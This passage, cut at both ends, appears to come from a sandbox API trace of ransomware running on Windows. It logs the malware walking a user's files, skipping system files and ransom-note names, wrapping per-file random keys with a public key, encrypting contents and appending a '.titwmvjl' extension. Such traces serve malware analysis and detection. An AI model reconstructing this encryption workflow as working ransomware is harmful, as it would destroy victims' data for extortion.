lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.965] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x9c64, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x9c64, lpOverlapped=0x0) returned 1 [0069.966] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.966] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0069.967] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.972] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.972] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.972] CloseHandle (hObject=0x2b4) returned 1 [0069.974] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\azf9wm.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\azf9wm.avi.titwmvjl"), dwFlags=0x1) returned 1 [0069.975] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.975] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.975] lstrcmpW (lpString1="B8CDRg.xls", lpString2=".") returned 1 [0069.976] lstrcmpW (lpString1="B8CDRg.xls", lpString2="..") returned 1 [0069.976] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="B8CDRg.xls" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls" [0069.976] lstrlenW (lpString=".titwmvjl") returned 9 [0069.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls") returned 48 [0069.976] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.976] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls.titwmvjl") returned 57 [0069.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls") returned 48 [0069.976] lstrlenW (lpString=".xls") returned 4 [0069.976] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.976] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xls ") returned 5 [0069.976] lstrcmpiW (lpString1=".xls", lpString2=".titwmvjl") returned 1 [0069.976] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls") returned 48 [0069.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls") returned 48 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="desktop.ini") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="autorun.inf") returned 1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="ntuser.dat") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="iconcache.db") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="bootsect.bak") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="boot.ini") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="ntuser.dat.log") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="thumbs.db") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="KRAB-DECRYPT.html") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="CRAB-DECRYPT.html") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="ntldr") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="NTDETECT.COM") returned -1 [0069.977] lstrcmpiW (lpString1="B8CDRg.xls", lpString2="Bootfont.bin") returned -1 [0069.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls") returned 48 [0069.977] lstrlenW (lpString=".xls") returned 4 [0069.977] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.977] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xls ") returned 5 [0069.977] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.978] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.978] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\b8cdrg.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0069.978] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.978] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.979] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.980] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.980] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.980] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.981] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.981] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0069.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.981] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.981] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.981] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.982] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.982] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.982] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.982] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0069.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.983] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.983] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.983] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.984] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0069.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.984] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.984] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.985] GetLastError () returned 0x0 [0069.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.985] CryptDestroyKey (hKey=0x5036f8) returned 1 [0069.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.985] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.985] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.986] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5037b8) returned 1 [0069.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.986] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.986] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.987] GetLastError () returned 0x0 [0069.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.987] CryptDestroyKey (hKey=0x5037b8) returned 1 [0069.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.988] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.988] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.988] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.988] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x103d7, lpOverlapped=0x0) returned 1 [0069.997] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffefc29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.997] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x103d7, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x103d7, lpOverlapped=0x0) returned 1 [0070.000] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.002] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.007] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.008] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.008] CloseHandle (hObject=0x2b4) returned 1 [0070.010] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\b8cdrg.xls"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\B8CDRg.xls.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\b8cdrg.xls.titwmvjl"), dwFlags=0x1) returned 1 [0070.011] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.011] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.011] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.011] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock" [0070.011] lstrlenW (lpString=".titwmvjl") returned 9 [0070.011] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock") returned 62 [0070.011] VirtualAlloc (lpAddress=0x0, dwSize=0xbc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.012] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 71 [0070.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock") returned 62 [0070.012] lstrlenW (lpString=".lock") returned 5 [0070.012] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.012] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.012] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.012] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.012] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.012] lstrcmpW (lpString1="ghU7s.docx", lpString2=".") returned 1 [0070.012] lstrcmpW (lpString1="ghU7s.docx", lpString2="..") returned 1 [0070.013] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="ghU7s.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx" [0070.013] lstrlenW (lpString=".titwmvjl") returned 9 [0070.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx") returned 48 [0070.013] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.013] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx.titwmvjl") returned 57 [0070.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx") returned 48 [0070.013] lstrlenW (lpString=".docx") returned 5 [0070.013] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.013] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".docx ") returned 6 [0070.013] lstrcmpiW (lpString1=".docx", lpString2=".titwmvjl") returned -1 [0070.013] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx") returned 48 [0070.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx") returned 48 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="desktop.ini") returned 1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="autorun.inf") returned 1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="ntuser.dat") returned -1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="iconcache.db") returned -1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="bootsect.bak") returned 1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="boot.ini") returned 1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="ntuser.dat.log") returned -1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="thumbs.db") returned -1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="KRAB-DECRYPT.html") returned -1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="CRAB-DECRYPT.html") returned 1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="ntldr") returned -1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="NTDETECT.COM") returned -1 [0070.014] lstrcmpiW (lpString1="ghU7s.docx", lpString2="Bootfont.bin") returned 1 [0070.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx") returned 48 [0070.014] lstrlenW (lpString=".docx") returned 5 [0070.014] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.014] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".docx ") returned 6 [0070.014] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.014] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.015] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ghu7s.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.015] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.015] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.016] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.016] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.016] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.017] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.017] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.017] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.018] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.018] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.018] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.018] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.018] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.018] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.019] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.019] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.019] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.019] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.020] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.020] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.020] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.020] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.021] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503938) returned 1 [0070.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.021] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.021] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.022] GetLastError () returned 0x0 [0070.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.022] CryptDestroyKey (hKey=0x503938) returned 1 [0070.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.022] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.022] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.023] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.023] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503478) returned 1 [0070.023] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.023] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.023] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.023] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.024] GetLastError () returned 0x0 [0070.024] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.024] CryptDestroyKey (hKey=0x503478) returned 1 [0070.024] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.024] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.024] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.025] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.025] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0xf12f, lpOverlapped=0x0) returned 1 [0070.033] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff0ed1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.033] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xf12f, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0xf12f, lpOverlapped=0x0) returned 1 [0070.036] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.037] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.041] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.041] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.041] CloseHandle (hObject=0x2b4) returned 1 [0070.044] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ghu7s.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ghU7s.docx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ghu7s.docx.titwmvjl"), dwFlags=0x1) returned 1 [0070.044] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.044] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.044] lstrcmpW (lpString1="gR1CBuQqpVYIz.png", lpString2=".") returned 1 [0070.044] lstrcmpW 